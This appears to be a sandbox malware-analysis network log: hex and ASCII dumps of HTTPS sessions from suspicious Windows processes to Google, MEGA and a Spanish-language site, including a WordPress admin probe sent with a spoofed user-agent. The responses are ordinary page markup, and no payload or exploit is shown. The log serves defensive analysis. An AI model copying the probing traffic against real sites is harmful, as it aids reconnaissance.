                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 70 70 2f 6d 61 72 6b 65 74 5f 6f 6e 65 74 72 75 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36 6e 7a 73 6d 57 51 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 30 61 64 63 39 32 63 34 63 38 35 62 34 34 66 30 39 35 34 30 62 39 64 39 34 34 65 31 34 64 62 37 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pp/market_onetrust_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="b7H4SGXRSdeaDkA6nzsmWQ">window.zmGlobalMrktId = "0adc92c4c85b44f09540b9d944e14db7" || null;window.zmGlobalMrktKey = "" || null;window['optimizel
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 33 36 32 30 30 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36 6e 7a 73 6d 57 51 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 37 48 34 53 47 58 52 53 64 65 61 44 6b 41 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 36200;}.expired-cc-banner .zm-icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="b7H4SGXRSdeaDkA6nzsmWQ" src="/csrf_js"></script><script nonce="b7H4SGXRSdeaDkA6
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 4d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M = document.getElementById('ot-cookie-pref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',')
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 64 6b 2d 73 68 6f 77 2d 73 65 74 74 69 6e 67 73 20 7b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dk-show-settings {padding-left: 10px;border-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translate
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 68 42 75 74 74 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hButton" aria-expanded="false" aria-controls="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><pat


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                227192.168.2.649770142.250.105.844434328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC229OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 42 73 31 4d 37 34 4c 7a 61 47 64 56 39 65 7a 72 39 38 69 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hBs1M74LzaGdV9ezr98iiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                228192.168.2.64973331.216.144.54432156C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC157OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC969INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2689
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: geoip=RO
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                229192.168.2.649731104.21.5.254432864C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F0GpF4fCxu3%2FiLvU%2F6Tv4copxeTwdAOxHBG08%2FGJiTCkXNtoExt39aj9xGMSWZ9ZRrR%2Bg%2BMI4QbMQA7KNsmkvLYX7MzllojLNJYESlb%2BL8RboEEH6zxjT0Ovt1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6cec8a44db-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 32 38 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e 3a 2e 20 54 65 72 6e 61 4e 65 74 20 2e 3a 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 2f 62 6f 6f 74 73 74 72 61 70 74 61 73 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 20 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: avbar navbar-default navbar-static-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 72 65 66 3d 22 73 65 70 69 6e 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 53 6f 63 69 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 6d 6f 76 69 6c 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 4d 6f 76 69 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 69 64 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 49 44 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 68 6f 76 65 72 3d 22 64 72 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref="sepin.html">TernaSocial</a></li><li><a href="ternamovil.html">TernaMovil</a></li><li><a href="ternaid.html">TernaID</a></li></ul></li><li class="dropdown"> <a href="#" class="dropdown-toggle " data-toggle="dropdown" data-hover="dropdown" data-de
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 69 6f 6e 65 73 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 74 68 65 6d 65 22 3e 45 64 69 63 69 6f 6e 65 73 20 79 20 50 72 65 63 69 6f 73 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 73 6c 69 64 65 73 2f 34 2e 6a 70 67 22 20 61 6c 74 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 70 3e c2 bf 4c 65 20 69 6e 74 65 72 65 73 61 20 6e 75 65 73 74 72 6f 20 73 65 72 76 69 63 69 6f 3f 3c 2f 70 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 65 64 69 63 69 6f 6e 65 73 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 74 68 65 6d 65 22 3e 45 64 69 63 69 6f 6e 65 73 20 79 20 50 72 65 63 69 6f 73 3c 2f 61 3e 20 3c 2f 64 69 76 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iones.html" class="btn btn-theme">Ediciones y Precios</a> </div></li><li> <img src="img/slides/4.jpg" alt /><div class="flex-caption"><p>Le interesa nuestro servicio?</p><a href="ediciones.html" class="btn btn-theme">Ediciones y Precios</a> </div>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 64 65 6c 20 63 6c 69 65 6e 74 65 20 61 20 66 69 6e 20 64 65 20 6f 66 72 65 63 65 72 20 6c 61 20 6d 61 79 6f 72 20 61 64 61 70 74 61 62 69 6c 69 64 61 64 20 61 20 73 75 73 20 6e 65 63 65 73 69 64 61 64 65 73 2e 20 45 73 20 70 6f 72 20 65 73 74 6f 20 71 75 65 20 66 75 6e 63 69 6f 6e 61 20 70 61 72 61 20 43 6f 6c 65 67 69 6f 73 2c 20 4c 69 63 65 6f 73 2c 20 49 6e 73 74 69 74 75 74 6f 73 20 55 6e 69 76 65 72 73 69 74 61 72 69 6f 73 2c 20 43 65 6e 74 72 6f 20 64 65 20 43 75 72 73 6f 73 2c 20 55 6e 69 76 65 72 73 69 64 61 64 65 73 20 79 20 64 65 6d c3 a1 73 2e 3c 2f 70 3e 0a 0a 0a 3c 70 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 74 68 69 73 5f 73 68 61 72 69 6e 67 5f 74 6f 6f 6c 62 6f 78 22 3e 3c 2f 64 69 76 3e 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: del cliente a fin de ofrecer la mayor adaptabilidad a sus necesidades. Es por esto que funciona para Colegios, Liceos, Institutos Universitarios, Centro de Cursos, Universidades y dems.</p><p><div class="addthis_sharing_toolbox"></div></p></div></
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC1369INData Raw: 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67 6e 63 65 6e 74 65 72 22 3e 0a 3c 68 34 3e 41 75 74 6f 6d 61 74 69 7a 61 63 69 c3 b3 6e 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6f 67 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 4c 6f 73 20 72 65 71 75 69 73 69 74 6f 73 20 61 63 61 64 c3 a9 6d 69 63 6f 73 20 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 6f 73 20 73 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /div></div></div></div><div class="row"><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Automatizacin</h4><div class="icon"> <i class="fa fa-cog fa-3x"></i> </div><p>Los requisitos acadmicos y administrativos so
